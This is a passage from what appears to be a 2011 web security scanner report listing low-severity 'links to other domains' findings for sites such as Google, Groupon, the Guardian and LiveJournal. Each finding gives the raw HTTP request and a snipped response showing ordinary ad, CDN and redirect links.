Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 302 Found
Location: http://linux.maruhn.com/sec/aub.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 14:54:16 GMT
Server: gws
Content-Length: 233
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://linux.maruhn.com/sec/aub.html">here</A>
...[SNIP]...

20.682. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/url?sa=t&source=web&cd=2&ved=0CCsQFjAB&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&ei=pZI9TfOKFcH_lgf0opSUBw&usg=AFQjCNECWp14hodR9dtEDuYY7b8bZ8CRoA
The response contains the following link to another domain:
  • http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html

Request

GET /url?sa=t&source=web&cd=2&ved=0CCsQFjAB&url=http%3A%2F%2Fwww.x64bitdownload.com%2Fdownloads%2Ft-64-bit-ozum-download-lhtivuds.html&ei=pZI9TfOKFcH_lgf0opSUBw&usg=AFQjCNECWp14hodR9dtEDuYY7b8bZ8CRoA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 302 Found
Location: http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 14:54:36 GMT
Server: gws
Content-Length: 273
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html">here</A>
...[SNIP]...

20.683. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/url?sa=t&source=web&cd=3&ved=0CCYQFjAC&url=http%3A%2F%2Fmako.cc%2Fprojects%2Faub%2F&ei=kpI9TcPtJYP6lwf-z4DqBQ&usg=AFQjCNFQESCJL7PN0mu6oprm0-NkOa73Sg
The response contains the following link to another domain:
  • http://mako.cc/projects/aub/

Request

GET /url?sa=t&source=web&cd=3&ved=0CCYQFjAC&url=http%3A%2F%2Fmako.cc%2Fprojects%2Faub%2F&ei=kpI9TcPtJYP6lwf-z4DqBQ&usg=AFQjCNFQESCJL7PN0mu6oprm0-NkOa73Sg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt

Response

HTTP/1.1 302 Found
Location: http://mako.cc/projects/aub/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 24 Jan 2011 14:54:22 GMT
Server: gws
Content-Length: 225
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://mako.cc/projects/aub/">here</A>
...[SNIP]...

20.684. http://www.google.com/webhp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /webhp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.google.com/webhp?hl=en&tab=ww
The response contains the following link to another domain:
  • http://www.youtube.com/?hl=en&tab=w1

Request

GET /webhp?hl=en&tab=ww HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=42=TKkfn6Tg7OKIy4aZoe4v6m5-9eWtGaicWAxOp0ReoP7haXOs4wVSbY3dIWgiz04r_L-gfyIMSiYfCfw16ffNlM8YVHvy9fcgoDr9uWOPODsh-QzrVXD7T9MKFCea-X0V;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:39:48 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: __utmz=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=www.google.com
Set-Cookie: __utma=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=www.google.com
Set-Cookie: __utmz=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=.www.google.com
Set-Cookie: __utma=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=.www.google.com
Set-Cookie: __utmz=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=google.com
Set-Cookie: __utma=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=google.com
Set-Cookie: __utmz=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=.google.com
Set-Cookie: __utma=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/webhp; domain=.google.com
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google</title><script>window.google={kEI:"VKs9TZahEYeqeOWzuPcD",kEXPI:"17259,17291,27615,28186,2823
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

20.685. http://www.groupon.com/washington-dc/subscribe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /washington-dc/subscribe

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.groupon.com/washington-dc/subscribe?utm_source=Google&utm_medium=cpc&utm_campaign=Explorer&d=District_of_Columbia_-_Washington&p=joomlacode.org&a=Text/
The response contains the following links to other domains:
  • http://ads.bluelithium.com/pixel?id=620625&t=2
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
  • http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js
  • http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.js
  • http://assets1.grouponcdn.com/assets/subscriptions.js?B1519gUv
  • http://assets1.grouponcdn.com/images/groupon/landing_pages/confirm_city.gif?4UuFdEOc
  • http://assets1.grouponcdn.com/images/groupon/landing_pages/enter_email.gif?fyP2Y5Ml
  • http://assets1.grouponcdn.com/images/groupon/landing_pages/save_on_deals_blue4.gif?D9Bsq0Tc
  • http://assets1.grouponcdn.com/images/groupon/landing_pages/step_1.gif?UNq811WL
  • http://assets1.grouponcdn.com/images/groupon/landing_pages/step_2.gif?kNhmeTIh
  • http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC
  • http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?mFqOEBi1
  • http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?vGis9EFL
  • http://assets1.grouponcdn.com/stylesheets/app/landing/index.css?zm9BnoJf
  • http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_two_steps10.css?hm_Wnumm
  • http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=washington-dc;u2=;ord=1?
  • http://pixel.33across.com/ps/?pid=263&cgn=13441&seg=3420
  • http://www.googleadservices.com/pagead/conversion.js
  • http://www.googleadservices.com/pagead/conversion/1019040093/?label=U-p3CPOX4wEQ3aL15QM&script=0

Request

GET /washington-dc/subscribe?utm_source=Google&utm_medium=cpc&utm_campaign=Explorer&d=District_of_Columbia_-_Washington&p=joomlacode.org&a=Text/ HTTP/1.1
Host: www.groupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 25 Jan 2011 04:41:06 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: utm_content=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_medium=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpmed=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_term=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_campaign=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: b=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: external_uid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpoid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpref2=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpuid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: utm_source=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpcid=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _tpaid=Google; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
Set-Cookie: adchemy_id=Explorer; path=/
Set-Cookie: _tpmed=cpc; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
Set-Cookie: _tpcid=Explorer; domain=.groupon.com; path=/; expires=Tue, 01-Feb-2011 04:41:06 GMT
Set-Cookie: division=washington-dc; path=/; expires=Fri, 25-Feb-2011 04:41:06 GMT
Set-Cookie: area=dc-metro; path=/; expires=Fri, 25-Feb-2011 04:41:06 GMT
Set-Cookie: b=525bb898-283d-11e0-a3b5-005056957e9b; path=/; expires=Mon, 25-Jan-2021 04:41:06 GMT
Set-Cookie: s=525bc5ae-283d-11e0-a3b5-005056957e9b; path=/
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: opt_default=7980234323; path=/; expires=Fri, 25-Jan-2013 04:41:06 GMT
Set-Cookie: opt_7980234323_v=0; path=/; expires=Fri, 25-Jan-2013 04:41:06 GMT
Set-Cookie: visited=true; path=/; expires=Mon, 25-Jan-2021 04:41:06 GMT
Set-Cookie: _thepoint=e54b532010193ffb80929de47a093240; domain=.groupon.com; path=/; expires=Wed, 26 Jan 2011 04:41:06 GMT; HttpOnly
Status: 200
ETag: "cc98647c2c5c60b56a748ca5db959984"
X-S-COOKIE: 525bc5ae-283d-11e0-a3b5-005056957e9b
X-B-COOKIE: 525bb898-283d-11e0-a3b5-005056957e9b
X-Runtime: 72
Content-Length: 24855
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xmlns='http://www
...[SNIP]...
<meta content='7829106395' property='fb:app_id' />
<link href="http://assets1.grouponcdn.com/stylesheets/app/landing/index.css?zm9BnoJf" media="screen" rel="stylesheet" type="text/css" />
<link href="http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_two_steps10.css?hm_Wnumm" media="screen" rel="stylesheet" type="text/css" />
<link href='/groupon.ico' rel='icon' />
...[SNIP]...
</script>
<script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"></script>
...[SNIP]...
<div style='display:inline;'><img alt="?label=u-p3cpox4weq3al15qm&amp;script=0" border="0" height="0" src="http://www.googleadservices.com/pagead/conversion/1019040093/?label=U-p3CPOX4wEQ3aL15QM&amp;script=0" width="1" /></div>
...[SNIP]...
<noscript>
<iframe src="http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=washington-dc;u2=;ord=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...
</h1>
<img alt="Save 50% to 90% on Top-Rated Local Deals" class="save_three_steps" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/save_on_deals_blue4.gif?D9Bsq0Tc" />
<div class='city_name'>
...[SNIP]...
<div class='step'>
<img alt="Step 1 of 2" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_1.gif?UNq811WL" />
</div>
...[SNIP]...
<div class='header_three_steps'>
<img alt="Confirm_city" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/confirm_city.gif?4UuFdEOc" />
</div>
...[SNIP]...
<div class='step'>
<img alt="Step 2 of 2" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/step_2.gif?kNhmeTIh" />
</div>
...[SNIP]...
<div class='header_three_steps'>
<img alt="Enter_email" src="http://assets1.grouponcdn.com/images/groupon/landing_pages/enter_email.gif?fyP2Y5Ml" />
</div>
...[SNIP]...
</script>

<img src="http://ads.bluelithium.com/pixel?id=620625&t=2" width="1" height="1" />

<img alt="?pid=263&amp;cgn=13441&amp;seg=3420" src="http://pixel.33across.com/ps/?pid=263&amp;cgn=13441&amp;seg=3420" />
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/assets/subscriptions.js?B1519gUv" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/multi_steps.js?vGis9EFL" type="text/javascript"></script>
<script src="http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.js" type="text/javascript"></script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/alerts.js?IrgXe2LC" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://assets1.grouponcdn.com/javascripts/app/subscriptions/disable_on_submit.js?mFqOEBi1" type="text/javascript"></script>
...[SNIP]...

20.686. http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /media/2011/jan/24/amazon-lovefilm-deal-films/x26amp

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.guardian.co.uk/media/2011/jan/24/amazon-lovefilm-deal-films/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CIkBEKcCMAo\\x26amp;q\\x3damazon\\x26amp;usg\\x3dAFQjCNHMyB_Rk10da2jJg4TS5PCj5_BR7w\\x22
The response contains the following links to other domains:
  • http://adinfo-guardian.co.uk/
  • http://static.guim.co.uk/static/81552/networkfront/images/guardian_logo.gif

Request

GET /media/2011/jan/24/amazon-lovefilm-deal-films/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CIkBEKcCMAo\\x26amp;q\\x3damazon\\x26amp;usg\\x3dAFQjCNHMyB_Rk10da2jJg4TS5PCj5_BR7w\\x22 HTTP/1.1
Host: www.guardian.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:45:10 GMT
Server: Apache
Set-Cookie: GU_MU=VFQyc2xncjZEQ2NBQUE5aXRIVUFBQURlfHpnL2wyNjdSUGZ3VWY1cHFDSUpmQVE9PQ==; path=/; domain=.guardian.co.uk; expires=Thu, 21-Jan-2021 16:45:10 GMT
Set-Cookie: GU_LOCATION=dXNhOjU6Zmw6NDpob2xseXdvb2Q6NDo1Mjg6YnJvYWRiYW5kOiAyNi4wNDg6LTgwLjEyNUAyNDUxMTUxNTUxNTAxNjExMDYxNjExODc1MjE3MDU3MjkxMTAxMzUxMzA5OA==; path=/; domain=.guardian.co.uk; expires=Mon, 14-Feb-2011 16:45:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 10
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<a href="http://www.guardian.co.uk"><img src="http://static.guim.co.uk/static/81552/networkfront/images/guardian_logo.gif" height="52" width="343" alt="guardian.co.uk home" /></a>
...[SNIP]...
<li><a href="http://adinfo-guardian.co.uk/" name="&lid={areas/common/footer}{Advertising guide}&lpos={areas/common/footer}{4}">Advertising guide</a>
...[SNIP]...

20.687. http://www.hugg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hugg.com
Path:   /submit

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.hugg.com/submit?url={u}
The response contains the following link to another domain:
  • http://www.treehugger.com/?url=%7bu%7d

Request

GET /submit?url={u} HTTP/1.1
Host: www.hugg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 04:41:22 GMT
Server: Apache/2.2.14
Location: http://www.treehugger.com/?url=%7bu%7d
Cache-Control: max-age=1
Expires: Tue, 25 Jan 2011 04:41:23 GMT
Content-Length: 222
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.treehugger.com/?url=%7bu%7d">here</a>
...[SNIP]...

20.688. http://www.jeroenwijering.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jeroenwijering.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.jeroenwijering.com/?item=JW_WMV_Player
The response contains the following link to another domain:
  • http://www.longtailvideo.com/players/jw-wmv-player/

Request

GET /?item=JW_WMV_Player HTTP/1.1
Host: www.jeroenwijering.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 04:41:41 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://www.longtailvideo.com/players/jw-wmv-player/
Cache-Control: max-age=300
Expires: Tue, 25 Jan 2011 04:46:41 GMT
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.longtailvideo.com/players/jw-wmv-player/">here</a>
...[SNIP]...

20.689. http://www.linkagogo.com/go/AddNoPopup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkagogo.com
Path:   /go/AddNoPopup

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.linkagogo.com/go/AddNoPopup?url={u}&title={t}
The response contains the following link to another domain:
  • http://www.google-analytics.com/urchin.js

Request

GET /go/AddNoPopup?url={u}&title={t} HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27el44"
Last-Modified: Tue, 25 Jan 2011 04:41:55 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16313
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:41:53 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:41:53 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

20.690. http://www.lithuanianjoomla.com/component/users/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lithuanianjoomla.com
Path:   /component/users/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.lithuanianjoomla.com/component/users/?view=reset&Itemid=
The response contains the following link to another domain:
  • http://www.joomla.org/

Request

GET /component/users/?view=reset&Itemid= HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:29 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<p>
Powered by <a href="http://www.joomla.org/">Joomla!&#174;</a>
...[SNIP]...

20.691. http://www.liutilities.com/affcb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.liutilities.com
Path:   /affcb/

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.liutilities.com/affcb/?id=DSgen&aff=2736&xat=gen
The response contains the following link to another domain:
  • http://store.uniblue.com/278/purl-DSgen?affiliate=2736&x-at=gen

Request

GET /affcb/?id=DSgen&aff=2736&xat=gen HTTP/1.1
Host: www.liutilities.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Mon, 24 Jan 2011 16:02:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://store.uniblue.com/278/purl-DSgen?affiliate=2736&x-at=gen
Content-Length: 188
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCAQDBDA=DLMAJEECAJLANPFOCGMPMNJJ; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://store.uniblue.com/278/purl-DSgen?affiliate=2736&amp;x-at=gen">here</a>.</body>

20.692. http://www.livejournal.com/update.bml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livejournal.com
Path:   /update.bml

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.livejournal.com/update.bml?subject={u}
The response contains the following links to other domains:
  • http://ad.doubleclick.net/ad/lj.servicepages/fullscreenadsbml;dcopt=ist;fs=1;sz=1x1;tile=1;ord=8934157304?
  • http://ad.doubleclick.net/ad/lj.servicepages/updatebml;sz=300x250;tile=1;ord=3212145872?
  • http://ad.doubleclick.net/ad/lj.servicepages/updatebml;sz=728x90;tile=2;ord=3212145872?
  • http://ad.doubleclick.net/jump/lj.servicepages/fullscreenadsbml;dcopt=ist;fs=1;tile=1;ord=8934157304?
  • http://ad.doubleclick.net/jump/lj.servicepages/updatebml;sz=300x250;tile=1;ord=3212145872?
  • http://ad.doubleclick.net/jump/lj.servicepages/updatebml;sz=728x90;tile=2;ord=3212145872?
  • http://aqua.livejournal.ru/
  • http://b.scorecardresearch.com/p?c1=2&c2=7602110&c3=&c4=&c5=&c6=&c15=&cj=1
  • http://livejournalinc.com/sales.php
  • http://www.livejournalinc.com/
  • http://www.livejournalinc.com/jobs/
  • http://www.zazzle.com/livejournal
  • https://www.zazzle.com/livejournal*

Request

GET /update.bml?subject={u} HTTP/1.1
Host: www.livejournal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 04:43:07 GMT
Server: Apache/2.2.3 (CentOS)
X-AWS-Id: ws33
Set-Cookie: ljuniq=jzQTYmiEBa2zjKs:1295930587:pgstats0:m0; expires=Saturday, 26-Mar-2011 04:43:07 GMT; domain=.livejournal.com; path=/
X-XSS-Protection: 0
Cache-Control: private, proxy-revalidate
ETag: "c18ff03bfcaa62b5388099a4abe874d9"
Content-length: 48184
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<
...[SNIP]...
<NOSCRIPT>
<A rel="nofollow" HREF="http://ad.doubleclick.net/jump/lj.servicepages/updatebml;sz=728x90;tile=2;ord=3212145872?" target="_blank">
<img src="http://ad.doubleclick.net/ad/lj.servicepages/updatebml;sz=728x90;tile=2;ord=3212145872?"
width="728" height="90" border="0" alt="">
</A>
...[SNIP]...
<NOSCRIPT>
<A rel="nofollow" HREF="http://ad.doubleclick.net/jump/lj.servicepages/fullscreenadsbml;dcopt=ist;fs=1;tile=1;ord=8934157304?" target="_blank">
<img src="http://ad.doubleclick.net/ad/lj.servicepages/fullscreenadsbml;dcopt=ist;fs=1;sz=1x1;tile=1;ord=8934157304?"
width="" height="" border="0" alt="">
</A>
...[SNIP]...
<NOSCRIPT>
<A rel="nofollow" HREF="http://ad.doubleclick.net/jump/lj.servicepages/updatebml;sz=300x250;tile=1;ord=3212145872?" target="_blank">
<img src="http://ad.doubleclick.net/ad/lj.servicepages/updatebml;sz=300x250;tile=1;ord=3212145872?"
width="300" height="250" border="0" alt="">
</A>
...[SNIP]...
<li><a href="http://livejournalinc.com/sales.php">Advertise</a>
...[SNIP]...
<li><a href="http://www.livejournalinc.com/jobs/">Jobs</a>
...[SNIP]...
<li><a href="http://www.livejournalinc.com/">More...</a>
...[SNIP]...
<li><a href="http://aqua.livejournal.ru/">LJ Aqua</a>
...[SNIP]...
<li><a href="https://www.zazzle.com/livejournal*">Merchandise</a>
...[SNIP]...
<li class=''><a href='http://www.zazzle.com/livejournal'>Merchandise</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=7602110&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

